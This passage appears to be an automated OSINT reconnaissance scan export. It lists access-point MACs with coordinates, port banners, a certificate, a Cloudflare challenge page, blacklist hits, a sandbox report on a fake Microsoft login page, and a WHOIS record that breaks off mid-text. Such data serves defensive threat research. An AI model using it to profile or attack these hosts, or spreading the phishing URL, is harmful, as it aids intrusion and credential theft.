| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | suddenlink.net-5263 (Net ID: 2C:99:24:25:52:61) | 37.751, -97.822 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-F3A2 (Net ID: 00:1D:D2:43:F3:A0) | 32.8608, -79.9746 |
| 2023-05-12 02:55:18 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | Ubuntu Linux | 46.101.229.70 |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
CF-RAY: 7c5ddd7eab1d10af-ORD
| 188.114.97.1 |
| 2023-05-12 03:24:29 | Company Name | No | Company Name Extractor | 0 | 0 | 3 | 0 | None | Cloudflare\, Inc. | C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | TrackmaniaLadder (Category: gaming)
https://en.tm-ladder.com/login_rech.php | login |
| 2023-05-12 03:00:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.56): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:0C:41:AC:F5:99) | 39.0469, -77.4903 |
| 2023-05-12 03:11:15 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'London', u'security': {u'is_vpn': False}, u'city_geoname_id': 2643743, u'region_geoname_id': 6269131, u'country': u'United States', u'region': u'England', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'CloudFLARENET-EU', u'organization_name': None, u'autonomous_system_number': 13335}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'W1B', u'longitude': -97.822, u'country_code': u'US', u'timezone': {u'abbreviation': u'CDT', u'gmt_offset': -5, u'is_dst': True, u'name': u'America/Chicago', u'current_time': u'22:11:14'}, u'latitude': 37.751, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2a06:98c1:3121::1', u'continent': u'North America', u'region_iso_code': u'ENG'} | 2a06:98c1:3121::1 |
| 2023-05-12 02:50:26 | Raw Data from RIRs | No | GLEIF | 0 | 0 | 3 | 0 | None | [{u'relationships': {u'lei-records': {u'data': {u'type': u'lei-records', u'id': u'5493007DY18BGNLDWU14'}, u'links': {u'related': u'https://api.gleif.org/api/v1/lei-records/5493007DY18BGNLDWU14'}}}, u'attributes': {u'highlighting': u'<b>CLOUDFLARE</b>, <b>INC</b>.', u'value': u'CLOUDFLARE, INC.'}, u'type': u'autocompletions'}] | Cloudflare\, Inc. |
| 2023-05-12 02:44:15 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Node.js | nwapi2.battleb0t.xyz |
| 2023-05-12 02:56:50 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:03:e6:77:f0:fb:1d:de:0e:93:d2:d9:e5:40:98:fb:b1:42
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Nov 17 08:07:50 2022 GMT
Not After : Feb 15 08:07:49 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:b1:ca:c5:7f:45:88:ea:f6:98:9e:7e:93:33:29:
bd:74:fc:48:fe:29:e9:2a:62:8c:97:f1:93:16:6f:
19:da:24:7c:94:17:6e:35:5b:b2:ef:eb:77:ee:6f:
68:a3:10:bb:0d:f6:01:57:78:db:8f:85:23:65:1b:
8d:5a:d8:02:5e
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
26:F8:75:40:42:15:34:A1:4E:96:C0:96:27:7F:34:DA:52:69:CF:39
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: ecdsa-with-SHA384
30:64:02:30:30:65:da:98:dc:09:a7:4c:e4:33:3c:8a:ff:b4:
b6:a4:7c:dd:85:ba:d7:a9:30:8d:0e:63:cf:13:17:15:57:f9:
3b:12:68:dc:4b:97:91:0c:68:5e:6b:01:4b:4a:0f:a7:02:30:
78:5a:55:48:6e:2f:4f:60:b1:ea:bf:ab:1e:2c:b1:95:69:ea:
9d:d3:dc:5e:73:96:b4:1e:5a:b2:fd:e0:bd:42:cc:83:a6:42:
5c:5a:f3:1b:e0:65:96:82:07:eb:9c:bc
|
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.74): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | x-cache: HIT | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-ewr18140-EWR", "x-cache": "HIT", "x-github-request-id": "1AD4:4FA0:AFAB37:106D10A:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "47e9025f17d9e6e936d804b3c00d7989ec4a827a", "date": "Fri, 12 May 2023 02:54:12 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "559", "x-timer": "S1683860053.987504,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 02:54:13 | Web Content | No | Web Spider | 2 | 0 | 1 | 0 | None | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f60363a5a178c')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="49Idt7TVQjX1pBvRrI.6aeE3rlIvevuAC7b5vTR0YGE-1683860053-0-AY2CmFGtsZtnLcnB3KaVSnayJydAFpMBwiHerGE4rgR3JSYE2THMUlIcqEG1Ue8w91NqXc1_LHx6GFVlXiEAESIr_nGQ5go_qchKEn3Zd9LGEn7sjdr5MGswrCl99ImQfUgu6KdI_WivVs4bd90GT85W3eqgKUj3u0FUHAfgMsZls8XQdBKgHld4LM0wMOiwkj4Zv_skkfuoeKho_dzt4CkE8TkBrPt00M8eIbThaadGvVY0ZXacJCnFJrMWgEfguZYQYUBYVuQPCo4vsaoC9FJto9c6wa1TZj17T__0EGfb7iIg-Fe40vQL0GKl1g68OrtJF7bhLP5OSmmfJD-JBdOEbpA042KC5D5FyslCSfE7VL_rZtwmaMGkKhFs9rNjkGtzvRpQkvZRYfyEeWln9xUv2AoyKgo_1wsNTA_ve-XNzmkKtYDqJDpKDva2W3pJ_3486t1fxBPGklTfmIx9NlGkUpFz141VY7sqmJxOdPADiSQrKzSt-fovaHrioNcpkC_a9kgYIR8XX9ZtGjpkxl_IolwlzL--CdPxkW0zMtKJ-ob6rp2YNV1BUrgbluir9hqadqgAXGwt_gZWou60RMf3UaSZgv32iteEpLg55lWyX9LlrUvEr69WGY_mW2VC6sS9celjhcxiPOQLUkE6KOI9dyhMsK_hvZhX7dDzQsZTH4jAvHUf9CQD2LuSWPV3IPZysl2v0-TSOr10-QdcM27ziun4ot0DvTudFu8lZubQ6YgSwrTQ0wlCjvSq6gwpTOqihrt99F-QaEJWo9sY1ul0FhgMesYynTr4n3snoOM31ZGsLMXWKlkFnwUy1gZdrnW6lGoCkCZNGJjETZCrO0I1-blCIjRzIo6n3EQP7MT5qxAPdJn4-285kyLwMrAm9nW0Fi-T32j1LOogUb6WyPmjQkstsoGMIPyZHJWu0K53P0Hp3SPyKBDSdN4PFWJ5HhYglCXZ4frWkFfTdPf1mz5N5hMALh4FLKDLHit2KyOqpzy4LGkpslmmSQV9AzBKoRj1GEO_-FcLHTt9Y_hlt3lZHsDBr1qsBzb2CCXFE8o-Cu7OAduNH_CAS2sCSdUmt1KpWrCRaId6zphb5lrgZKo6-UG1p8eW6scfDanDgxE_uwAeJyjUHxAEdnSiE1KEwJ9jCVqAgp9dVVHeTI4rz44dE3vG-URKonk4rAmwzUrgRitO_d4uGYtEZ4E7qxVnEHPqSPPlSj7XCukbKVCLBJxrlSwrndqrFnPWXTVbd4VDbjuKYax1pPS7eYUGT_UeCCeppPOHUje3Psa1ejipoF94FUlnfTdlsYbhNQHOKrCLTleuO-lGh4FkydbCaYMbMeAAZyBt0xtAetQyd7ldNHUNuC2Nofi66SO1NL6dsaVskjPRRnE6ZvIpqMSXLJLgGQGDosioOi4TetnoLMpoodURiB_nIbRVwEcdjLeqlr_heAlhB9DjGpMi7U2THwVCr2WtE0eC7jgUi7EvjeNq152r1Qqg397yfToV5_wu059jWgynPgNUwC4lcn5G-MBIXveyQXm1Kc3wCLL9zpH8MAPvrg7a-sB2jNRF-Z6W26XqIgEKRCWc-Pxvv_Wf4vRraOQIcroiI7Bz-VZanQ8qRRCNJq9kL7QMtAUM-80bmDBTJgrVoo5PdyUEhsNJHqX9OXSul2XByOb4cFHCten8oYXlq-xQqbPW5cLy025uWQytdBIECEqK0e5vKcu_KE0Uj51a0tZyH3JcwbPPE_fH4pbZorm5Kg1q7pYpinkOp5o93d4llyQL17ps--AQEqRvOWDfy9ih2KJc_BE5lNLHq-v1h4WyL3qch3dFUNrf6TKv44d5E5ZODSf9MR91_YJ1LP3HF-0gnEEbwwFvu5w7kqPMreWbivd9zybQFoONhHZIvue3MsgjfZ1vLvfzi0_pLzPV9XnL3aZnuVWNQ5m-tjTF6DVwD4heQQWtO8aBzn7YpoO7pmb5XcFPRZknXUl9vyibdHsym3ALRgx4Xf0sXY0Egq8vPrGtUmUt_qhEJTk5P3R0wsoRFa49pkuv79cmFbVV6UYUcsY_Ht1FZEPOAMMuij1BfHolOncuoa8HH91s4MToLK5e4ZXLCuwnrhU1Iz07g8_F8FiO-szvC0BSEfX52p_c3LsFOQ8KHGFOOtlIbkgQfFx7vErT1y0UZSuoR1HN5mwxz005itrk8qw-cU_4QXYVr0nnwhQQexYkVxHYLRxlHlGu9xonuO_9eyVCe8GyN79j4Enif4_dFDplAW77cjHRHWhMTCE5n_dU-96YMnkyFZr2m1KSUUWqQndQzduR6sMHEDQuErbPvLqIaJ3xphVgcTAzrMD12jvSU-bukvEL-wHHmzTDiCAItW9qw0XBzVZ7Ll736rJi4i9XorZ16wxKlOhw9SC6r707lQ43XMPgmmt8I71p5Y7NNqy-niBv8MJGeGRjObImH8n6JVBEQ7vEkMfTCD53zst2b-4V3RTMfSwntBlaoqZZYZdNBZBlFTqFK5PeKUk6cNexkn95wQmcJcuYO0vxq3IUpP6X">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '94216',
cRay: '7c5f60363a5a178c',
cHash: 'a8c2f7f784ba63b',
cUPMDTk: "\/?__cf_chl_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'TetCTvIHDoj9yN1Q4CtSp4oIXaz0U+HIhBy4s5iV5musPrd3qRRyHc90BWI/jzQYM3TsRZmdrYIIHsGBQ3rbPW3lOoqcfi5CawfhzjAeMsvCOqeqTs713ExQ08oz+vVkhRriZ7KOQkOV4gBocW2cG02BuWOMw473YNbayiyCJXNB9iidY4XwtRQU/oWv27be04lXHovk9dndBeKEBgbit5s9pMfaIl2tziG8KWxKRTXRRw94m0HSrFr22Qs7or0V3+F4nT0oqiT9CcwY4AtGAb1j1UI+nGhI1ep4c+HVRPQEv5JYmnedW8parB9/FBeu/+bgHoTPsvVjRcT+Zj3bh9L0pk5dvmAuwrAT2+Y12w3HYJ8EUaGW5hUxEwUm3qO45VrjFOfVZH1XXhpCDpIgdaMP38+Gmi8gCSX1fmRmElBR13XOvdIqlcHPrE3eBXTlLOzhqpjHznAyvR3aMgy5C0JAffwSrtelgLWCQTUkAhSVivNH0wfno5PZypoOVrpGZ9n0kycNgQnfvHpFI9kAmKT2MlQ1LuH6zqEPZLkiqKrLJjogiPERqj0XyjcrK42c',
t: 'MTY4Mzg2MDA1My40NzkwMDA=',
m: 'X3NUo99x/4mGPFmrz69qVs5k5pJtmgeVcyYRkA87vXs=',
i1: 'Sn1NO9u6sfSr5lno+YjwEg==',
i2: 'LxAqQZecIh4w4zR/ETAJ7g==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f60363a5a178c');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f60363a5a178c';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
| ayhu.xyz |
| 2023-05-12 02:56:21 | Netblock Membership | No | RIPE | 0 | 0 | 2 | 0 | None | 87.248.157.0/24 | 87.248.157.102 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 29 | 0 | 2 | 0 | None | https://funny.battleb0t.xyz/ | funny.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:5D:96:FD) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:09:00 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.94 | 87.248.157.102 |
| 2023-05-12 02:48:34 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://sweetushivi17.github.io/Microsoft-login-page/', u'type': u'submitted', u'verdict': u'suspicious'}, {u'url': u'http://sweetushivi17.github.io/microsoft-login-page/', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://sweetushivi17.github.io/microsoft-login-page', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://sweetushivi17.github.io/Microsoft-login-page/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_b84_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_b84_ConnHashTable<2948>_HashTable_Mutex"\n "IsoScope_b84_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2948"\n "IsoScope_b84_IESQMMUTEX_0_303"\n "IsoScope_b84_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_b84_IE_EarlyTabStart_0xc60_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:80"\n "185.199.110.153:443"\n "104.16.86.20:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"sweetushivi17.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.jsdelivr.net"\n "sweetushivi17.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'".bi-twitter::before { content: "\\f5ef"; }" (Indicator: "twitter")\n ".bi-youtube::before { content: "\\f62b"; }" (Indicator: "youtube")\n ".bi-paypal::before { content: "\\f662"; }" (Indicator: "paypal")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"logo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "gradient_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 3000x2000 components 3"- [targetUID: N/A]\n "bootstrap.min_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "bootstrap-icons_1_.woff" has type "Web Open Font Format TrueType length 164360 version 1.0"- [targetUID: N/A]\n "bootstrap-icons_1_.css" has type "ASCII text"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002948]\n "~DF53903A5E404B1FCB.TMP" has type "data"- Location: [%TEMP%\\~DF53903A5E404B1FCB.TMP]- [targetUID: 00000000-00002948]\n "~DF05E154F480DFB66A.TMP" has type "data"- Location: [%TEMP%\\~DF05E154F480DFB66A.TMP]- [targetUID: 00000000-00002948]\n "~DFA5701C5187025040.TMP" has type "data"- Location: [%TEMP%\\~DFA5701C5187025040.TMP]- [targetUID: 00000000-00002948]\n "RecoveryStore._A6C704DF-DD69-11ED-A7BD-080027F574BD_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_A6C704E1-DD69-11ED-A7BD-080027F574BD_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_AF26B50C-DD69-11ED-A7BD-080027F574BD_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "style_1_.css" has type "ASCII text"- [targetUID: N/A]\n "Microsoft-login-page_2_.htm" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "3P2T1AIT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3P2T1AIT.txt]- [targetUID: 00000000-00003404]\n "84GBFS1L.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\84GBFS1L.txt]- [targetUID: 00000000-00002948]\n "BI76777G.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\BI76777G.txt]- [targetUID: 00000000-00002948]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-62', u'name': u'Communicates with HTTP webserver (GET/POST requests)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Found http requests in header "GET /Microsoft-login-page/"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://sweetushivi17.github.io/Microsoft-login-page/"\n Pattern match: "http://sweetushivi17.github.io"\n Pattern match: "https://getbootstrap.com/"\n Pattern match: "https://github.com/twbs/bootstrap/blob/main/LICENSE"\n Pattern match: "SUIDMmicrosoft.com/9216393460646431027691283476884631027574*MUID137D942D0AA16C820DDA86DB0B256DBFmicrosoft.com/1025406709568031106045283492509631027574*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA6"\n Pattern match: "https://icons.getbootstrap.com/"\n Pattern match: "https://github.com/twbs/icons/blob/main/LICENSE.md"\n Pattern match: "SUIDMmicrosoft.com/9216393460646431027691283476884631027574*MUID137D942D0AA16C820DDA86DB0B256DBFmicrosoft.com/1025406709568031106045283492509631027574*_EDGE_V1microsoft.com/9216406709568031106045283508134631027574*SRCHDAF=NOFORMmicrosoft.com/10243323789440"\n Pattern match: "https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/css/bootstrap.min.css"\n Pattern match: "https://cdn.jsdelivr.net/npm/bootstrap-icons@1.10.4/font/bootstrap-icons.css"\n Pattern match: "isdomainmigratedtruewww.msn.com/102566554790431063801283883134631027574*"\n Pattern match: "www.msn.com/"\n Pattern match: "MUID2B12DF6F2BEE647803B1CD992AA265D9msn.com/1025406709568031106045283883134631027574*"\n Pattern match: "SUIDMmicrosoft.com/9216393460646431027691283476884631027574*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743*SRCHUSRDOB=202201"\n Pattern match: "MUIDB137D942D0AA16C820DDA86DB0B256DBFieonline.microsoft.com/9216406709568031106045283492509631027574*"\n Heuristic match: "sweetushivi17.github.io"\n Heuristic match: "cdn.jsdelivr.net"\n Heuristic match: "GET /Microsoft-login-page/ HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateDNT: 1Connection: Keep-AliveHost: sweetushivi17.git"\n Pattern match: "https://sweetushivi17.github.io/Microsoft-login-page/Accept-Language"\n Heuristic match: "weetushivi17.github.io"\n Pattern match: "sweetushivi17.github.io/Microsoft-login-page/"\n Pattern match: "http://www.windows.com/pctv"\n Pattern match: "http://go.microsoft.com/fwlink/?linkid=53081"\n Pattern match: "www.microsoft.com/extender/help"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwl"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=70599"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=145837"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkID=57190"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=145765"\n Heuristic match: "Example: computer.fabrikam.com"\n Pattern match: "vista.gallery.microsoft.com/vista/SideShow.aspx"\n Pattern match: "http://www.icra.org/vocabulary/"\n Pattern match: "wmploc.dll/Offline_Buy.htm\'res://wmploc.dll/Offline_MediaGuide.htm*res://wmploc.dll/Offline_Subscriptions.htm"\n Pattern match: "http://go.micros | 185.199.110.153 |
| 2023-05-12 03:42:55 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | abuse@world4you.com | Domain Name: INFLANY.COM
Registry Domain ID: 2688698192_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.world4you.com
Registrar URL: http://www.world4you.com
Updated Date: 2023-04-13T07:19:32Z
Creation Date: 2022-04-12T14:21:11Z
Registry Expiry Date: 2024-04-12T14:21:11Z
Registrar: World4You Internet Services GmbH
Registrar IANA ID: 1476
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS1.WORLD4YOU.AT
Name Server: NS2.WORLD4YOU.AT
DNSSEC: signedDelegation
DNSSEC DS Data: 36937 13 2 B736B70844AD09A9498F06982C97724A0BF4ACA8DE5244B40607B538A5323618
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:42:43Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
